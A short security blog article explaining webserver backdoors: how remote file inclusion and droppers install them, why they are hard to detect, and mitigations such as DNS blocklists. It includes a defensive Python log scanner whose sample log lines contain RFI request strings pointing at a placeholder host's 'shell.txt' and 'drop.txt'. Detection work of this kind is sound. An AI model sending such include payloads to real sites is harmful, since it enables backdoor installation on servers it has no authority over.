by peter

Backdoor Explained

Risk

Risk Rating: HIGH
Likelihood: 3/5
Impact: 5/5

Causes

  • Lack of endpoint protection
  • Lack of monitoring
  • Poor patching

Backdoor Overview

A backdoor is a remote access method used by Advanced Persistent Threats and by malware that negates normal authentication procedures to access a system. As a result, remote access is granted to resources within an application, such as databases and file servers, giving perpetrators the ability to remotely issue system commands and update malware.

Backdoor installation is achieved by taking advantage of vulnerable components in a web application. Once installed, detection is difficult as files tend to be highly obfuscated.

Webserver backdoors are used for a number of malicious activities, including:

What you need to know about Backdoors

Once installed, backdoors are very hard to weed out. Traditionally, detection involves using software scanners to search for known malware signatures in a server file system. Backdoors can occasionally be detected through vulnerability scanning. This process is error prone, however. Backdoor shell files are almost always masked through the use of alias names and—more significantly—code obfuscation (sometimes even multiple layers of encryption).

Detection is further complicated since many applications are built on external frameworks that use third-party plugins; these are sometimes laden with vulnerabilities or built-in backdoors. Scanners that rely on heuristic and signature-based rules might not be able to detect hidden code in such frameworks.

Even if the malware is detected, typical mitigation methods (or even a system reinstallation) are unlikely to remove it from an application. This is particularly true when the backdoor maintains a persistent presence in rewritable memory.

The best detection method is through your Security Operations Center. They should be detecting the compromise and preventing it from occurring. Having a DNS service such as the Quad9 project in place, or DNS blocklists, will hinder a backdoor's ability to maintain persistence.

How Backdoor attacks happen

The most prevalent backdoor installation method involves remote file inclusion (RFI), an attack vector that exploits vulnerabilities within applications that dynamically reference external scripts. In an RFI scenario, the referencing function is tricked into downloading a backdoor Trojan from a remote host.

Perpetrators typically identify targets using scanners, which locate websites with unpatched or outdated components that enable file injection. Once a scanner finds such a site, the attacker abuses the vulnerability to install the backdoor on the underlying server. Once installed, it can be accessed at any time, even if the vulnerability that enabled its injection has since been patched.

Backdoor Trojan injection is often done in a two-step process to bypass security rules preventing the upload of files above a certain size. The first phase involves installation of a dropper—a small file whose sole function is to retrieve a bigger file from a remote location. It initiates the second phase—the downloading and installation of the backdoor script on the server.
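As an added illustration of the RFI pattern described above (example code, not from the original article), here is a small Python check that scans web-server access-log lines for query parameters whose decoded value is a URL on an untrusted host, the signature of an include-style function being pointed at a remote script. The log lines and the trusted-host allow-list are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache-style) for the example; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 200 2048
203.0.113.9 - - [10/Oct/2023:13:56:05 +0000] "GET /view.php?tpl=https%3A%2F%2F198.51.100.7%2Fdrop.txt HTTP/1.1" 200 1024
203.0.113.2 - - [10/Oct/2023:13:57:10 +0000] "GET /redirect.php?next=https://www.example.com/home HTTP/1.1" 302 0
"""

# Minimal parser for the fields we need: client IP, timestamp, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Hosts the application legitimately references in parameters (assumed allow-list).
TRUSTED_HOSTS = {"www.example.com"}

# Schemes that fetch content from another host; such a value in an include-style
# parameter is the classic RFI indicator.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def find_rfi_attempts(log_text, trusted_hosts=TRUSTED_HOSTS):
    """Return one record per request whose query parameter points at an untrusted remote host."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines we cannot parse rather than failing the whole run
        parsed = urlparse(m.group("path"))
        # parse_qs percent-decodes values, so encoded URLs (https%3A%2F%2F...) are caught too.
        for param, values in parse_qs(parsed.query, keep_blank_values=True).items():
            for value in values:
                target = urlparse(value)
                if target.scheme in REMOTE_SCHEMES and target.netloc and target.hostname not in trusted_hosts:
                    hits.append({"client": m.group("ip"), "time": m.group("ts"),
                                 "script": parsed.path, "param": param,
                                 "remote_host": target.hostname, "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        # A 200 on such a request is the worrying case: the include may have succeeded.
        print(f"{hit['time']} {hit['client']} {hit['script']}?{hit['param']}= -> {hit['remote_host']} (HTTP {hit['status']})")
```

Run against real logs, a hit with a 200 response is a trigger to pull the file system for newly written or modified scripts around that timestamp.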

Attack Sources

Backdoors occur only after a successful compromise of a system in some form. The initial compromise can come from anywhere, but an installed backdoor is most likely to reveal itself by sending traffic out to unusual IP addresses. This should be picked up by your Security Operations Center.